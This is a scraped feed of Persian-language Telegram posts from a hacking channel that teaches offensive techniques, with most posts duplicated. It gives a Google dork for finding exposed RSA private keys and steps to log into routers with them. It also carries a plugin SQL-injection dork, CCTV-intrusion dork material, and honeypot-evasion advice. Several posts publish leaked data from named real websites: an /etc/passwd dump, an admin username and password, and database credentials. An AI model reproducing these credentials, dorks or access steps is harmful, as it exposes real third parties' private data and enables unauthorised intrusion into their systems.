#Dork
با سلام خدمت تمامی اعضای
امروز قراره نحوه ی دسترسی به روتر از طریق RSA-Private Key رو برای شما اموزش بدیم :
➖➖➖➖
برای اینکه بفهمید RSA-Private Key چیست!؟
اینجا کلیک کنید.
➖➖➖➖➖
نحوه ی پیدا کردن RSA-Private Key :
#Dork :
"-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa
➖➖➖➖➖➖➖
#Access :
#_نحوه ی دسترسی :
۱- نرم افزار putty را روی سیستم خود باز کنید و یک پروفایل جدید بسیازید.
(فایل RSA روبه صورت ppk. سیو کنید)
۲- از نوار سمت راست روی گزینه SSH وسپس روی گزینه Auth کلیک کنید.
۳- فایل private key خود را اضافه کنید و بر روی open کلیک کنید.
#Description :
بعضی مواقع با کرک هش هممیتونید به این مقادیر User & pass دسترسی پیدا کنید.
➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
با سلام خدمت تمامی اعضای
امروز قراره نحوه ی دسترسی به روتر از طریق RSA-Private Key رو برای شما اموزش بدیم :
➖➖➖➖
برای اینکه بفهمید RSA-Private Key چیست!؟
اینجا کلیک کنید.
➖➖➖➖➖
نحوه ی پیدا کردن RSA-Private Key :
#Dork :
"-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa
➖➖➖➖➖➖➖
#Access :
#_نحوه ی دسترسی :
۱- نرم افزار putty را روی سیستم خود باز کنید و یک پروفایل جدید بسیازید.
(فایل RSA روبه صورت ppk. سیو کنید)
۲- از نوار سمت راست روی گزینه SSH وسپس روی گزینه Auth کلیک کنید.
۳- فایل private key خود را اضافه کنید و بر روی open کلیک کنید.
#Description :
بعضی مواقع با کرک هش هممیتونید به این مقادیر User & pass دسترسی پیدا کنید.
➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
#Dork #vulnerabilities #Sqli
➖➖➖➖➖➖➖➖➖➖
باگ SQL در افزونه ی وردپرسی From Maker :
#Dork~:
#Exploit~:
CWE
#Description~:
این باگ در نسخه ی 1.13.36 و نسخه های پایین تر وجود دارد.
➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖
باگ SQL در افزونه ی وردپرسی From Maker :
#Dork~:
inurl:wp-content/plugins/from-maker
#Exploit~:
Sql Query
CWE
#Description~:
این باگ در نسخه ی 1.13.36 و نسخه های پایین تر وجود دارد.
➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
cwe.mitre.org
CWE -
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (4.17)
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (4.17)
Common Weakness Enumeration (CWE) is a list of software weaknesses.
#Config #Pw #Access
➖➖➖➖➖➖➖➖
اینم از این :()
https://billrockworld.com
SysInfo~:
CentOS Linux release 7.8.2003 (Core)
SSH-Config~:
Download
➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖
اینم از این :()
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:997:994:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false cpanelroundcube:x:201:201::/var/cpanel/userhomes/cpanelroundcube:/bin/false mailman:x:996:992:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash cpanelphpmyadmin:x:995:991:phpMyAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:994:990:phpPgAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanel:x:202:202::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanellogin:x:203:203::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:204:204::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell cpaneleximscanner:x:205:205::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell cpanelconnecttrack:x:206:206::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell cpanelanalytics:x:207:207::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell cpanelcabcache:x:208:208::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell cpanelrrdtool:x:209:209::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false cpses:x:993:989::/var/cpanel/cpses:/sbin/nologin secretoftruelife:x:1001:1002::/home/secretoftruelife:/bin/bash mediagenies:x:1002:1003::/home/mediagenies:/bin/bash clamav:x:1003:1004::/home/clamav:/sbin/nologin aspiredesign:x:1005:1006::/home/aspiredesign:/usr/local/cpanel/bin/noshell
Target~:https://billrockworld.com
SysInfo~:
CentOS Linux release 7.8.2003 (Core)
SSH-Config~:
Download
➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
#User and #Pass
➖➖➖➖➖➖➖
#Target:
http://colegiocopello.com.ar/admin/login.php
#Username:
admin
#Password:
s]Ua6n6KQ!.*7sQ
➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖
#Target:
http://colegiocopello.com.ar/admin/login.php
#Username:
admin
#Password:
s]Ua6n6KQ!.*7sQ
➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
آموزش جمع آوری اطلاعات از سایت با Shodan
Shodan.io
#Shodan #information_gathering
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Shodan.io
#Shodan #information_gathering
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
موتورهای جستجو مخصوص هکرها
shodan.io
hunter.io
censys.io
onyphe.io
zoomeye.org
wigle.net
ghostproject.fr
viz.Greynoise.io/table
app.binaryedge.io
fofa.so
grep.app
crt.sh
#Pentest #Serach
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
shodan.io
hunter.io
censys.io
onyphe.io
zoomeye.org
wigle.net
ghostproject.fr
viz.Greynoise.io/table
app.binaryedge.io
fofa.so
grep.app
crt.sh
#Pentest #Serach
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡1
آشنایی با موتور جستجو Shodan
#Pentest #Serach #Shodan
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Pentest #Serach #Shodan
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Db_Conf #Password #Username #User #Pass
➖➖➖➖➖➖➖
&_UserName :
&_Password :
&_Target : Partnervc.com
➖➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖
&_UserName :
yscr_a5bCH
&_Password :
GKPXE1yhF8GRY0
&_Target : Partnervc.com
➖➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
هانی پات یا سیستم واقعی ؟
برای اینکه بفهمید IP ای که دارید و قراره ازش اطلاعات مفیدی دربیارید و بهش حمله کنید و امنیتش رو تست کنید ! یک سیستم هانیپات هست یا نه یک سیستم واقعی میتوانید از این سرویس استفاده کنید:
Link
#shodan
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
برای اینکه بفهمید IP ای که دارید و قراره ازش اطلاعات مفیدی دربیارید و بهش حمله کنید و امنیتش رو تست کنید ! یک سیستم هانیپات هست یا نه یک سیستم واقعی میتوانید از این سرویس استفاده کنید:
Link
#shodan
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش نحوه نفوذ به دوربین های مدار بسته با angry ip و shodan
#camera #Shodan
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#camera #Shodan
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Google_Dorks_List_2017.pdf
373.5 KB
مجموعه ای از دورک برای نفوذ به دوربین های مداربسته
#camera #dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#camera #dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#LFI #vulnerabilities #OpenSIS #Webapp
#Local_File_Inclusion #Versian 7.4 <<
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در سیستم OenSIS ورژن 7.4 و پایینتر
بررسی اسیب پذیری در پست بعدی.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#Local_File_Inclusion #Versian 7.4 <<
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در سیستم OenSIS ورژن 7.4 و پایینتر
بررسی اسیب پذیری در پست بعدی.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army